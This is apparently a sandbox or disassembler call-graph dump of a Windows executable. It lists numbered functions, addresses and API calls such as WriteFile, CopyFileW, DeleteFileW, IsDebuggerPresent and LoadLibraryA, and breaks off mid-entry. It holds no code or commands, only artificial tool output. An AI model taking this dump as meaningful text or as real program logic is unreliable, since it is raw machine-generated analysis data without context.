102729->102730 102731 7dd89f 102730->102731 102732 7dd8b6 102730->102732 102830 7d8af4 58 API calls __getptd_noexit 102731->102830 102734 7dd955 102732->102734 102736 7dd8ca 102732->102736 102836 7d8af4 58 API calls __getptd_noexit 102734->102836 102735 7dd8a4 102831 7d8b28 58 API calls __getptd_noexit 102735->102831 102739 7dd8e8 102736->102739 102740 7dd8f2 102736->102740 102832 7d8af4 58 API calls __getptd_noexit 102739->102832 102757 7dd206 102740->102757 102741 7dd8ed 102837 7d8b28 58 API calls __getptd_noexit 102741->102837 102742 7dd8ab _fprintf 102742->102686 102745 7dd8f8 102747 7dd91e 102745->102747 102748 7dd90b 102745->102748 102833 7d8b28 58 API calls __getptd_noexit 102747->102833 102766 7dd975 102748->102766 102749 7dd961 102838 7d8db6 9 API calls _fprintf 102749->102838 102753 7dd917 102835 7dd94d LeaveCriticalSection __unlock_fhandle 102753->102835 102754 7dd923 102834 7d8af4 58 API calls __getptd_noexit 102754->102834 102758 7dd212 _fprintf 102757->102758 102759 7dd261 EnterCriticalSection 102758->102759 102760 7d9c0b __lock 58 API calls 102758->102760 102761 7dd287 _fprintf 102759->102761 102763 7dd237 102760->102763 102761->102745 102762 7dd24f 102840 7dd28b LeaveCriticalSection _doexit 102762->102840 102763->102762 102839 7d9e2b InitializeCriticalSectionAndSpinCount 102763->102839 102767 7dd982 __ftell_nolock 102766->102767 102768 7dd9c1 102767->102768 102769 7dd9e0 102767->102769 102794 7dd9b6 102767->102794 102850 7d8af4 58 API calls __getptd_noexit 102768->102850 102772 7dda38 102769->102772 102773 7dda1c 102769->102773 102777 7dda51 102772->102777 102856 7e18c1 60 API calls 3 library calls 102772->102856 102853 7d8af4 58 API calls __getptd_noexit 102773->102853 102774 7de1d6 102774->102753 102775 7dd9c6 102851 7d8b28 58 API calls __getptd_noexit 102775->102851 102841 7e5c6b 102777->102841 102779 7dda21 102854 7d8b28 58 API calls __getptd_noexit 102779->102854 102781 7dd9cd 102852 7d8db6 9 API calls _fprintf 102781->102852 102785 7dda5f 102786 7dddb8 102785->102786 102857 7d99ac 58 API calls 2 library calls 102785->102857 102788 7de14b WriteFile 102786->102788 102789 7dddd6 102786->102789 102787 7dda28 102855 7d8db6 9 API calls _fprintf 102787->102855 102792 7dddab GetLastError 102788->102792 102798 7ddd78 102788->102798 102793 7ddefa 102789->102793 102801 7dddec 102789->102801 102792->102798 102804 7ddfef 102793->102804 102806 7ddf05 102793->102806 102864 7dc5f6 102794->102864 102795 7dda8b GetConsoleMode 102795->102786 102797 7ddaca 102795->102797 102796 7de184 102796->102794 102862 7d8b28 58 API calls __getptd_noexit 102796->102862 102797->102786 102799 7ddada GetConsoleCP 102797->102799 102798->102794 102798->102796 102803 7dded8 102798->102803 102799->102796 102828 7ddb09 102799->102828 102800 7dde5b WriteFile 102800->102792 102805 7dde98 102800->102805 102801->102796 102801->102800 102808 7de17b 102803->102808 102809 7ddee3 102803->102809 102804->102796 102810 7de064 WideCharToMultiByte 102804->102810 102805->102801 102811 7ddebc 102805->102811 102806->102796 102812 7ddf6a WriteFile 102806->102812 102807 7de1b2 102863 7d8af4 58 API calls __getptd_noexit 102807->102863 102861 7d8b07 58 API calls 3 library calls 102808->102861 102859 7d8b28 58 API calls __getptd_noexit 102809->102859 102810->102792 102822 7de0ab 102810->102822 102811->102798 102812->102792 102814 7ddfb9 102812->102814 102814->102798 102814->102806 102814->102811 102817 7ddee8 102860 7d8af4 58 API calls __getptd_noexit 102817->102860 102818 7de0b3 WriteFile 102821 7de106 GetLastError 102818->102821 102818->102822 102821->102822 102822->102798 102822->102804 102822->102811 102822->102818 102823 7e7a5e WriteConsoleW CreateFileW __putwch_nolock 102826 7ddc5f 102823->102826 102824 7e62ba 60 API calls __write_nolock 102824->102828 102825 7ddbf2 WideCharToMultiByte 102825->102798 102827 7ddc2d WriteFile 102825->102827 102826->102792 102826->102798 102826->102823 102826->102828 102829 7ddc87 WriteFile 102826->102829 102827->102792 102827->102826 102828->102798 102828->102824 102828->102825 102828->102826 102858 7d35f5 58 API calls __isleadbyte_l 102828->102858 102829->102792 102829->102826 102830->102735 102831->102742 102832->102741 102833->102754 102834->102753 102835->102742 102836->102741 102837->102749 102838->102742 102839->102762 102840->102759 102842 7e5c76 102841->102842 102843 7e5c83 102841->102843 102844 7d8b28 __flsbuf 58 API calls 102842->102844 102845 7d8b28 __flsbuf 58 API calls 102843->102845 102847 7e5c8f 102843->102847 102846 7e5c7b 102844->102846 102848 7e5cb0 102845->102848 102846->102785 102847->102785 102849 7d8db6 _fprintf 9 API calls 102848->102849 102849->102846 102850->102775 102851->102781 102852->102794 102853->102779 102854->102787 102855->102794 102856->102777 102857->102795 102858->102828 102859->102817 102860->102794 102861->102794 102862->102807 102863->102794 102865 7dc5fe 102864->102865 102866 7dc600 IsProcessorFeaturePresent 102864->102866 102865->102774 102868 7e590a 102866->102868 102869 7e58b9 ___raise_securityfailure 5 API calls 102868->102869 102870 7e59ed 102869->102870 102870->102774 102871->102698 102872->102700 102896 7dd4c3 102873->102896 102875 7e0b41 102909 7dd43d 59 API calls 2 library calls 102875->102909 102877 7e0aeb 102877->102875 102879 7dd4c3 __close_nolock 58 API calls 102877->102879 102887 7e0b1f 102877->102887 102878 7dd4c3 __close_nolock 58 API calls 102880 7e0b2b CloseHandle 102878->102880 102883 7e0b16 102879->102883 102880->102875 102885 7e0b37 GetLastError 102880->102885 102881 7e0b49 102882 7e0b6b 102881->102882 102910 7d8b07 58 API calls 3 library calls 102881->102910 102882->102725 102884 7dd4c3 __close_nolock 58 API calls 102883->102884 102884->102887 102885->102875 102887->102875 102887->102878 102888->102707 102889->102723 102890->102710 102891->102725 102892->102723 102893->102710 102894->102718 102895->102723 102897 7dd4ce 102896->102897 102898 7dd4e3 102896->102898 102911 7d8af4 58 API calls __getptd_noexit 102897->102911 102903 7dd508 102898->102903 102913 7d8af4 58 API calls __getptd_noexit 102898->102913 102900 7dd4d3 102912 7d8b28 58 API calls __getptd_noexit 102900->102912 102903->102877 102904 7dd512 102914 7d8b28 58 API calls __getptd_noexit 102904->102914 102905 7dd4db 102905->102877 102907 7dd51a 102915 7d8db6 9 API calls _fprintf 102907->102915 102909->102881 102910->102882 102911->102900 102912->102905 102913->102904 102914->102907 102915->102905 103106 7b4bb5 102916->103106 102921 7b4e08 LoadLibraryExW 103116 7b4b6a 102921->103116 102922 7ed8e6 102924 7b4e4a 84 API calls 102922->102924 102926 7ed8ed 102924->102926 102928 7b4b6a 3 API calls 102926->102928 102930 7ed8f5 102928->102930 102929 7b4e2f 102929->102930 102931 7b4e3b 102929->102931 103142 7b4f0b 102930->103142 102933 7b4e4a 84 API calls 102931->102933 102935 7b4e40 102933->102935 102935->102565 102935->102567 102937 7ed91c 103150 7b4ec7 102937->103150 102941 7b7667 59 API calls 102940->102941 102942 7b45b1 102941->102942 102943 7b7667 59 API calls 102942->102943 102944 7b45b9 102943->102944 102945 7b7667 59 API calls 102944->102945 102946 7b45c1 102945->102946 102947 7b7667 59 API calls 102946->102947 102948 7b45c9 102947->102948 102949 7b45fd 102948->102949 102950 7ed4d2 102948->102950 102951 7b784b 59 API calls 102949->102951 102952 7b8047 59 API calls 102950->102952 102953 7b460b 102951->102953 102954 7ed4db 102952->102954 102955 7b7d2c 59 API calls 102953->102955 102956 7b7d8c 59 API calls 102954->102956 102957 7b4615 102955->102957 102959 7b4640 102956->102959 102958 7b784b 59 API calls 102957->102958 102957->102959 102961 7b4636 102958->102961 102960 7b4680 102959->102960 102962 7b465f 102959->102962 102973 7ed4fb 102959->102973 102963 7b784b 59 API calls 102960->102963 102965 7b7d2c 59 API calls 102961->102965 102967 7b79f2 59 API calls 102962->102967 102964 7b4691 102963->102964 102968 7b46a3 102964->102968 102971 7b8047 59 API calls 102964->102971 102965->102959 102966 7ed5cb 102969 7b7bcc 59 API calls 102966->102969 102970 7b4669 102967->102970 102972 7b46b3 102968->102972 102974 7b8047 59 API calls 102968->102974 102986 7ed588 102969->102986 102970->102960 102977 7b784b 59 API calls 102970->102977 102971->102968 102976 7b46ba 102972->102976 102978 7b8047 59 API calls 102972->102978 102973->102966 102975 7ed5b4 102973->102975 102981 7ed532 102973->102981 102974->102972 102975->102966 102980 7ed59f 102975->102980 102979 7b8047 59 API calls 102976->102979 102988 7b46c1 Mailbox 102976->102988 102977->102960 102978->102976 102979->102988 102984 7b7bcc 59 API calls 102980->102984 102982 7ed590 102981->102982 102989 7ed57b 102981->102989 102983 7b7bcc 59 API calls 102982->102983 102983->102986 102984->102986 102985 7b79f2 59 API calls 102985->102986 102986->102960 102986->102985 103315 7b7924 59 API calls 2 library calls 102986->103315 102988->102596 102990 7b7bcc 59 API calls 102989->102990 102990->102986 102992 7b7e4f 59 API calls 102991->102992 102993 7b79fd 102992->102993 102993->102602 102993->102605 102995 81408d 102994->102995 102996 8140a0 102995->102996 102997 814092 102995->102997 102999 7b7667 59 API calls 102996->102999 102998 7b8047 59 API calls 102997->102998 103047 81409b Mailbox 102998->103047 103000 8140a8 102999->103000 103001 7b7667 59 API calls 103000->103001 103002 8140b0 103001->103002 103003 7b7667 59 API calls 103002->103003 103004 8140bb 103003->103004 103005 7b7667 59 API calls 103004->103005 103006 8140c3 103005->103006 103007 7b7667 59 API calls 103006->103007 103008 8140cb 103007->103008 103009 7b7667 59 API calls 103008->103009 103010 8140d3 103009->103010 103011 7b7667 59 API calls 103010->103011 103012 8140db 103011->103012 103013 7b7667 59 API calls 103012->103013 103014 8140e3 103013->103014 103015 7b459b 59 API calls 103014->103015 103016 8140fa 103015->103016 103017 7b459b 59 API calls 103016->103017 103018 814113 103017->103018 103019 7b79f2 59 API calls 103018->103019 103020 81411f 103019->103020 103021 814132 103020->103021 103022 7b7d2c 59 API calls 103020->103022 103023 7b79f2 59 API calls 103021->103023 103022->103021 103024 81413b 103023->103024 103025 81414b 103024->103025 103026 7b7d2c 59 API calls 103024->103026 103027 7b8047 59 API calls 103025->103027 103026->103025 103028 814157 103027->103028 103029 7b7b2e 59 API calls 103028->103029 103030 814163 103029->103030 103316 814223 59 API calls 103030->103316 103032 814172 103317 814223 59 API calls 103032->103317 103034 814185 103035 7b79f2 59 API calls 103034->103035 103036 81418f 103035->103036 103037 814194 103036->103037 103038 8141a6 103036->103038 103039 7b7cab 59 API calls 103037->103039 103040 7b79f2 59 API calls 103038->103040 103041 8141a1 103039->103041 103042 8141af 103040->103042 103045 7b7b2e 59 API calls 103041->103045 103043 8141cd 103042->103043 103044 7b7cab 59 API calls 103042->103044 103046 7b7b2e 59 API calls 103043->103046 103044->103041 103045->103043 103046->103047 103047->102620 103049 819162 __ftell_nolock 103048->103049 103050 7d0db6 Mailbox 59 API calls 103049->103050 103051 8191bf 103050->103051 103052 7b522e 59 API calls 103051->103052 103053 8191c9 103052->103053 103054 818f5f GetSystemTimeAsFileTime 103053->103054 103055 8191d4 103054->103055 103056 7b4ee5 85 API calls 103055->103056 103057 8191e7 _wcscmp 103056->103057 103058 8192b8 103057->103058 103059 81920b 103057->103059 103060 819734 96 API calls 103058->103060 103335 819734 103059->103335 103077 819284 _wcscat 103060->103077 103064 7b4f0b 74 API calls 103066 8192dd 103064->103066 103065 8192c1 103065->102627 103067 7b4f0b 74 API calls 103066->103067 103069 8192ed 103067->103069 103068 819239 _wcscat _wcscpy 103342 7d40fb 58 API calls __wsplitpath_helper 103068->103342 103070 7b4f0b 74 API calls 103069->103070 103072 819308 103070->103072 103073 7b4f0b 74 API calls 103072->103073 103074 819318 103073->103074 103075 7b4f0b 74 API calls 103074->103075 103076 819333 103075->103076 103078 7b4f0b 74 API calls 103076->103078 103077->103064 103077->103065 103079 819343 103078->103079 103080 7b4f0b 74 API calls 103079->103080 103081 819353 103080->103081 103082 7b4f0b 74 API calls 103081->103082 103083 819363 103082->103083 103318 8198e3 GetTempPathW GetTempFileNameW 103083->103318 103085 81936f 103086 7d525b 115 API calls 103085->103086 103097 819380 103086->103097 103087 81943a 103088 7d53a6 __fcloseall 83 API calls 103087->103088 103089 819445 103088->103089 103091 81944b DeleteFileW 103089->103091 103092 81945f 103089->103092 103090 7b4f0b 74 API calls 103090->103097 103091->103065 103093 819505 CopyFileW 103092->103093 103098 819469 _wcsncpy 103092->103098 103094 81951b DeleteFileW 103093->103094 103095 81952d DeleteFileW 103093->103095 103094->103065 103332 8198a2 CreateFileW 103095->103332 103097->103065 103097->103087 103097->103090 103319 7d4863 103097->103319 103343 818b06 103098->103343 103103->102554 103104->102589 103105->102603 103155 7b4c03 103106->103155 103109 7b4bdc 103110 7b4bec FreeLibrary 103109->103110 103111 7b4bf5 103109->103111 103110->103111 103113 7d525b 103111->103113 103112 7b4c03 2 API calls 103112->103109 103159 7d5270 103113->103159 103115 7b4dfc 103115->102921 103115->102922 103239 7b4c36 103116->103239 103119 7b4b8f 103121 7b4baa 103119->103121 103122 7b4ba1 FreeLibrary 103119->103122 103120 7b4c36 2 API calls 103120->103119 103123 7b4c70 103121->103123 103122->103121 103124 7d0db6 Mailbox 59 API calls 103123->103124 103125 7b4c85 103124->103125 103126 7b522e 59 API calls 103125->103126 103127 7b4c91 _memmove 103126->103127 103128 7b4ccc 103127->103128 103129 7b4d89 103127->103129 103130 7b4dc1 103127->103130 103131 7b4ec7 69 API calls 103128->103131 103243 7b4e89 CreateStreamOnHGlobal 103129->103243 103254 81991b 95 API calls 103130->103254 103134 7b4cd5 103131->103134 103135 7b4f0b 74 API calls 103134->103135 103136 7b4d69 103134->103136 103138 7ed8a7 103134->103138 103249 7b4ee5 103134->103249 103135->103134 103136->102929 103139 7b4ee5 85 API calls 103138->103139 103140 7ed8bb 103139->103140 103141 7b4f0b 74 API calls 103140->103141 103141->103136 103143 7b4f1d 103142->103143 103146 7ed9cd 103142->103146 103272 7d55e2 103143->103272 103147 819109 103292 818f5f 103147->103292 103149 81911f 103149->102937 103151 7b4ed6 103150->103151 103152 7ed990 103150->103152 103297 7d5c60 103151->103297 103154 7b4ede 103156 7b4bd0 103155->103156 103157 7b4c0c LoadLibraryA 103155->103157 103156->103109 103156->103112 103157->103156 103158 7b4c1d GetProcAddress 103157->103158 103158->103156 103161 7d527c _fprintf 103159->103161 103160 7d528f 103208 7d8b28 58 API calls __getptd_noexit 103160->103208 103161->103160 103164 7d52c0 103161->103164 103163 7d5294 103209 7d8db6 9 API calls _fprintf 103163->103209 103178 7e04e8 103164->103178 103167 7d52c5 103168 7d52ce 103167->103168 103169 7d52db 103167->103169 103210 7d8b28 58 API calls __getptd_noexit 103168->103210 103171 7d5305 103169->103171 103172 7d52e5 103169->103172 103193 7e0607 103171->103193 103211 7d8b28 58 API calls __getptd_noexit 103172->103211 103174 7d529f @_EH4_CallFilterFunc@8 _fprintf 103174->103115 103179 7e04f4 _fprintf 103178->103179 103180 7d9c0b __lock 58 API calls 103179->103180 103191 7e0502 103180->103191 103181 7e0576 103213 7e05fe 103181->103213 103182 7e057d 103184 7d881d __malloc_crt 58 API calls 103182->103184 103186 7e0584 103184->103186 103185 7e05f3 _fprintf 103185->103167 103186->103181 103218 7d9e2b InitializeCriticalSectionAndSpinCount 103186->103218 103188 7d9c93 __mtinitlocknum 58 API calls 103188->103191 103190 7e05aa EnterCriticalSection 103190->103181 103191->103181 103191->103182 103191->103188 103216 7d6c50 59 API calls __lock 103191->103216 103217 7d6cba LeaveCriticalSection LeaveCriticalSection _doexit 103191->103217 103194 7e0627 __wopenfile 103193->103194 103195 7e0641 103194->103195 103207 7e07fc 103194->103207 103225 7d37cb 60 API calls 3 library calls 103194->103225 103223 7d8b28 58 API calls __getptd_noexit 103195->103223 103197 7e0646 103224 7d8db6 9 API calls _fprintf 103197->103224 103199 7e085f 103220 7e85a1 103199->103220 103200 7d5310 103212 7d5332 LeaveCriticalSection LeaveCriticalSection _fprintf 103200->103212 103203 7e07f5 103203->103207 103226 7d37cb 60 API calls 3 library calls 103203->103226 103205 7e0814 103205->103207 103227 7d37cb 60 API calls 3 library calls 103205->103227 103207->103195 103207->103199 103208->103163 103209->103174 103210->103174 103211->103174 103212->103174 103219 7d9d75 LeaveCriticalSection 103213->103219 103215 7e0605 103215->103185 103216->103191 103217->103191 103218->103190 103219->103215 103228 7e7d85 103220->103228 103222 7e85ba 103222->103200 103223->103197 103224->103200 103225->103203 103226->103205 103227->103207 103229 7e7d91 _fprintf 103228->103229 103230 7e7da7 103229->103230 103233 7e7ddd 103229->103233 103231 7d8b28 __flsbuf 58 API calls 103230->103231 103232 7e7dac 103231->103232 103234 7d8db6 _fprintf 9 API calls 103232->103234 103235 7e7e4e __wsopen_nolock 109 API calls 103233->103235 103238 7e7db6 _fprintf 103234->103238 103236 7e7df9 103235->103236 103237 7e7e22 __wsopen_helper LeaveCriticalSection 103236->103237 103237->103238 103238->103222 103240 7b4b83 103239->103240 103241 7b4c3f LoadLibraryA 103239->103241 103240->103119 103240->103120 103241->103240 103242 7b4c50 GetProcAddress 103241->103242 103242->103240 103244 7b4ea3 FindResourceExW 103243->103244 103248 7b4ec0 103243->103248 103245 7ed933 LoadResource 103244->103245 103244->103248 103246 7ed948 SizeofResource 103245->103246 103245->103248 103247 7ed95c LockResource 103246->103247 103246->103248 103247->103248 103248->103128 103250 7ed9ab 103249->103250 103251 7b4ef4 103249->103251 103255 7d584d 103251->103255 103253 7b4f02 103253->103134 103254->103128 103256 7d5859 _fprintf 103255->103256 103257 7d586b 103256->103257 103259 7d5891 103256->103259 103268 7d8b28 58 API calls __getptd_noexit 103257->103268 103261 7d6c11 __lock_file 59 API calls 103259->103261 103260 7d5870 103269 7d8db6 9 API calls _fprintf 103260->103269 103263 7d5897 103261->103263 103270 7d57be 83 API calls 4 library calls 103263->103270 103265 7d58a6 103271 7d58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 103265->103271 103267 7d587b _fprintf 103267->103253 103268->103260 103269->103267 103270->103265 103271->103267 103275 7d55fd 103272->103275 103274 7b4f2e 103274->103147 103276 7d5609 _fprintf 103275->103276 103277 7d564c 103276->103277 103278 7d561f _memset 103276->103278 103279 7d5644 _fprintf 103276->103279 103280 7d6c11 __lock_file 59 API calls 103277->103280 103288 7d8b28 58 API calls __getptd_noexit 103278->103288 103279->103274 103281 7d5652 103280->103281 103290 7d541d 72 API calls 6 library calls 103281->103290 103284 7d5639 103289 7d8db6 9 API calls _fprintf 103284->103289 103285 7d5668 103291 7d5686 LeaveCriticalSection LeaveCriticalSection _fprintf 103285->103291 103288->103284 103289->103279 103290->103285 103291->103279 103295 7d520a GetSystemTimeAsFileTime 103292->103295 103294 818f6e 103294->103149 103296 7d5238 __aulldiv 103295->103296 103296->103294 103298 7d5c6c _fprintf 103297->103298 103299 7d5c7e 103298->103299 103300 7d5c93 103298->103300 103311 7d8b28 58 API calls __getptd_noexit 103299->103311 103301 7d6c11 __lock_file 59 API calls 103300->103301 103303 7d5c99 103301->103303 103313 7d58d0 67 API calls 6 library calls 103303->103313 103304 7d5c83 103312 7d8db6 9 API calls _fprintf 103304->103312 103307 7d5ca4 103314 7d5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 103307->103314 103308 7d5c8e _fprintf 103308->103154 103310 7d5cb6 103310->103308 103311->103304 103312->103308 103313->103307 103314->103310 103315->102986 103316->103032 103317->103034 103318->103085 103320 7d486f _fprintf 103319->103320 103321 7d489d _fprintf 103320->103321 103322 7d488d 103320->103322 103323 7d48a5 103320->103323 103321->103097 103386 7d8b28 58 API calls __getptd_noexit 103322->103386 103324 7d6c11 __lock_file 59 API calls 103323->103324 103326 7d48ab 103324->103326 103374 7d470a 103326->103374 103327 7d4892 103387 7d8db6 9 API calls _fprintf 103327->103387 103333 8198c8 SetFileTime CloseHandle 103332->103333 103334 8198de 103332->103334 103333->103334 103334->103065 103340 819748 __tzset_nolock _wcscmp 103335->103340 103336 7b4f0b 74 API calls 103336->103340 103337 819210 103337->103065 103341 7d40fb 58 API calls __wsplitpath_helper 103337->103341 103338 819109 GetSystemTimeAsFileTime 103338->103340 103339 7b4ee5 85 API calls 103339->103340 103340->103336 103340->103337 103340->103338 103340->103339 103341->103068 103342->103077 103344 818b11 103343->103344 103345 818b1f 103343->103345 103346 7d525b 115 API calls 103344->103346 103347 818b64 103345->103347 103348 7d525b 115 API calls 103345->103348 103373 818b28 103345->103373 103346->103345 103392 818d91 74 API calls 3 library calls 103347->103392 103350 818b49 103348->103350 103350->103347 103373->103095 103376 7d4719 103374->103376 103381 7d4737 103374->103381 103375 7d4727 103376->103375 103376->103381 103384 7d4751 _memmove 103376->103384 103388 7d48dd LeaveCriticalSection LeaveCriticalSection _fprintf 103381->103388 103383 7d46e6 __flsbuf 58 API calls 103383->103384 103384->103381 103384->103383 103386->103327 103387->103321 103388->103321 103404 7b7a16 59 API calls 103403->103404 103423 7b6265 103404->103423 103405 7b646a 103431 7b750f 103405->103431 103407 7b6484 Mailbox 103407->102633 103410 7edff6 103441 80f8aa 91 API calls 4 library calls 103410->103441 103411 7b750f 59 API calls 103411->103423 103415 7ee004 103417 7b750f 59 API calls 103415->103417 103416 7b7d8c 59 API calls 103416->103423 103418 7ee01a 103417->103418 103418->103407 103419 7b6799 _memmove 103442 80f8aa 91 API calls 4 library calls 103419->103442 103420 7edf92 103421 7b8029 59 API calls 103420->103421 103422 7edf9d 103421->103422 103427 7d0db6 Mailbox 59 API calls 103422->103427 103423->103405 103423->103410 103423->103411 103423->103416 103423->103419 103423->103420 103425 7b7e4f 59 API calls 103423->103425 103429 7b5f6c 60 API calls 103423->103429 103430 7b5d41 59 API calls Mailbox 103423->103430 103439 7b5e72 60 API calls 103423->103439 103440 7b7924 59 API calls 2 library calls 103423->103440 103426 7b643b CharUpperBuffW 103425->103426 103426->103423 103427->103419 103428->102637 103429->103423 103430->103423 103432 7b75af 103431->103432 103436 7b7522 _memmove 103431->103436 103434 7d0db6 Mailbox 59 API calls 103432->103434 103433 7d0db6 Mailbox 59 API calls 103435 7b7529 103433->103435 103434->103436 103437 7d0db6 Mailbox 59 API calls 103435->103437 103438 7b7552 103435->103438 103436->103433 103437->103438 103438->103407 103439->103423 103440->103423 103441->103415 103442->103407 103443->102449 103444 7d7c56 103445 7d7c62 _fprintf 103444->103445 103481 7d9e08 GetStartupInfoW 103445->103481 103447 7d7c67 103483 7d8b7c GetProcessHeap 103447->103483 103449 7d7cbf 103450 7d7cca 103449->103450 103566 7d7da6 58 API calls 3 library calls 103449->103566 103484 7d9ae6 103450->103484 103453 7d7cd0 103454 7d7cdb __RTC_Initialize 103453->103454 103567 7d7da6 58 API calls 3 library calls 103453->103567 103505 7dd5d2 103454->103505 103457 7d7cea 103458 7d7cf6 GetCommandLineW 103457->103458 103568 7d7da6 58 API calls 3 library calls 103457->103568 103524 7e4f23 GetEnvironmentStringsW 103458->103524 103461 7d7cf5 103461->103458 103464 7d7d10 103465 7d7d1b 103464->103465 103569 7d30b5 58 API calls 3 library calls 103464->103569 103534 7e4d58 103465->103534 103468 7d7d21 103469 7d7d2c 103468->103469 103570 7d30b5 58 API calls 3 library calls 103468->103570 103548 7d30ef 103469->103548 103472 7d7d34 103473 7d7d3f __wwincmdln 103472->103473 103571 7d30b5 58 API calls 3 library calls 103472->103571 103554 7b47d0 103473->103554 103476 7d7d53 103477 7d7d62 103476->103477 103572 7d3358 58 API calls _doexit 103476->103572 103573 7d30e0 58 API calls _doexit 103477->103573 103480 7d7d67 _fprintf 103482 7d9e1e 103481->103482 103482->103447 103483->103449 103574 7d3187 36 API calls 2 library calls 103484->103574 103486 7d9aeb 103575 7d9d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 103486->103575 103488 7d9af0 103489 7d9af4 103488->103489 103577 7d9d8a TlsAlloc 103488->103577 103576 7d9b5c 61 API calls 2 library calls 103489->103576 103492 7d9af9 103492->103453 103493 7d9b06 103493->103489 103494 7d9b11 103493->103494 103578 7d87d5 103494->103578 103497 7d9b53 103586 7d9b5c 61 API calls 2 library calls 103497->103586 103500 7d9b32 103500->103497 103502 7d9b38 103500->103502 103501 7d9b58 103501->103453 103585 7d9a33 58 API calls 4 library calls 103502->103585 103504 7d9b40 GetCurrentThreadId 103504->103453 103506 7dd5de _fprintf 103505->103506 103507 7d9c0b __lock 58 API calls 103506->103507 103508 7dd5e5 103507->103508 103509 7d87d5 __calloc_crt 58 API calls 103508->103509 103511 7dd5f6 103509->103511 103510 7dd661 GetStartupInfoW 103518 7dd676 103510->103518 103519 7dd7a5 103510->103519 103511->103510 103512 7dd601 @_EH4_CallFilterFunc@8 _fprintf 103511->103512 103512->103457 103513 7dd86d 103600 7dd87d LeaveCriticalSection _doexit 103513->103600 103515 7d87d5 __calloc_crt 58 API calls 103515->103518 103516 7dd7f2 GetStdHandle 103516->103519 103517 7dd805 GetFileType 103517->103519 103518->103515 103518->103519 103521 7dd6c4 103518->103521 103519->103513 103519->103516 103519->103517 103599 7d9e2b InitializeCriticalSectionAndSpinCount 103519->103599 103520 7dd6f8 GetFileType 103520->103521 103521->103519 103521->103520 103598 7d9e2b InitializeCriticalSectionAndSpinCount 103521->103598 103525 7d7d06 103524->103525 103526 7e4f34 103524->103526 103530 7e4b1b GetModuleFileNameW 103525->103530 103527 7d881d __malloc_crt 58 API calls 103526->103527 103528 7e4f5a _memmove 103527->103528 103529 7e4f70 FreeEnvironmentStringsW 103528->103529 103529->103525 103531 7e4b4f _wparse_cmdline 103530->103531 103532 7d881d __malloc_crt 58 API calls 103531->103532 103533 7e4b8f _wparse_cmdline 103531->103533 103532->103533 103533->103464 103535 7e4d71 __wsetenvp 103534->103535 103539 7e4d69 103534->103539 103536 7d87d5 __calloc_crt 58 API calls 103535->103536 103541 7e4d9a __wsetenvp 103536->103541 103537 7e4df1 103538 7d2d55 _free 58 API calls 103537->103538 103538->103539 103539->103468 103540 7d87d5 __calloc_crt 58 API calls 103540->103541 103541->103537 103541->103539 103541->103540 103542 7e4e16 103541->103542 103545 7e4e2d 103541->103545 103601 7e4607 58 API calls 2 library calls 103541->103601 103544 7d2d55 _free 58 API calls 103542->103544 103544->103539 103602 7d8dc6 IsProcessorFeaturePresent 103545->103602 103547 7e4e39 103547->103468 103550 7d30fb __IsNonwritableInCurrentImage 103548->103550 103617 7da4d1 103550->103617 103551 7d3119 __initterm_e 103552 7d2d40 __cinit 67 API calls 103551->103552 103553 7d3138 _doexit __IsNonwritableInCurrentImage 103551->103553 103552->103553 103553->103472 103555 7b47ea 103554->103555 103565 7b4889 103554->103565 103556 7b4824 IsThemeActive 103555->103556 103620 7d336c 103556->103620 103560 7b4850 103632 7b48fd SystemParametersInfoW SystemParametersInfoW 103560->103632 103562 7b485c 103633 7b3b3a 103562->103633 103564 7b4864 SystemParametersInfoW 103564->103565 103565->103476 103566->103450 103567->103454 103568->103461 103572->103477 103573->103480 103574->103486 103575->103488 103576->103492 103577->103493 103579 7d87dc 103578->103579 103581 7d8817 103579->103581 103583 7d87fa 103579->103583 103587 7e51f6 103579->103587 103581->103497 103584 7d9de6 TlsSetValue 103581->103584 103583->103579 103583->103581 103595 7da132 Sleep 103583->103595 103584->103500 103585->103504 103586->103501 103588 7e521c 103587->103588 103589 7e5201 103587->103589 103592 7e522c HeapAlloc 103588->103592 103594 7e5212 103588->103594 103597 7d33a1 DecodePointer 103588->103597 103589->103588 103590 7e520d 103589->103590 103596 7d8b28 58 API calls __getptd_noexit 103590->103596 103592->103588 103592->103594 103594->103579 103595->103583 103596->103594 103597->103588 103598->103521 103599->103519 103600->103512 103601->103541 103603 7d8dd1 103602->103603 103608 7d8c59 103603->103608 103607 7d8dec 103607->103547 103609 7d8c73 _memset __call_reportfault 103608->103609 103610 7d8c93 IsDebuggerPresent 103609->103610 103616 7da155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103610->103616 103612 7dc5f6 __ld12tod 6 API calls 103614 7d8d7a 103612->103614 103613 7d8d57 __call_reportfault 103613->103612 103615 7da140 GetCurrentProcess TerminateProcess 103614->103615 103615->103607 103616->103613 103618 7da4d4 EncodePointer 103617->103618 103618->103618 103619 7da4ee 103618->103619 103619->103551 103621 7d9c0b __lock 58 API calls 103620->103621 103622 7d3377 DecodePointer EncodePointer 103621->103622 103685 7d9d75 LeaveCriticalSection 103622->103685 103624 7b4849 103625 7d33d4 103624->103625 103626 7d33de 103625->103626 103627 7d33f8 103625->103627 103626->103627 103686 7d8b28 58 API calls __getptd_noexit 103626->103686 103627->103560 103629 7d33e8 103687 7d8db6 9 API calls _fprintf 103629->103687 103631 7d33f3 103631->103560 103632->103562 103634 7b3b47 __ftell_nolock 103633->103634 103635 7b7667 59 API calls 103634->103635 103636 7b3b51 GetCurrentDirectoryW 103635->103636 103688 7b3766 103636->103688 103638 7b3b7a IsDebuggerPresent 103639 7b3b88 103638->103639 103640 7ed272 MessageBoxA 103638->103640 103641 7b3c61 103639->103641 103643 7ed28c 103639->103643 103644 7b3ba5 103639->103644 103640->103643 103642 7b3c68 SetCurrentDirectoryW 103641->103642 103645 7b3c75 Mailbox 103642->103645 103810 7b7213 59 API calls Mailbox 103643->103810 103769 7b7285 103644->103769 103645->103564 103648 7ed29c 103653 7ed2b2 SetCurrentDirectoryW 103648->103653 103653->103645 103685->103624 103686->103629 103687->103631 103689 7b7667 59 API calls 103688->103689 103690 7b377c 103689->103690 103812 7b3d31 103690->103812 103692 7b379a 103693 7b4706 61 API calls 103692->103693 103694 7b37ae 103693->103694 103695 7b7de1 59 API calls 103694->103695 103696 7b37bb 103695->103696 103697 7b4ddd 136 API calls 103696->103697 103698 7b37d4 103697->103698 103699 7b37dc Mailbox 103698->103699 103700 7ed173 103698->103700 103704 7b8047 59 API calls 103699->103704 103854 81955b 103700->103854 103703 7ed192 103707 7d2d55 _free 58 API calls 103703->103707 103705 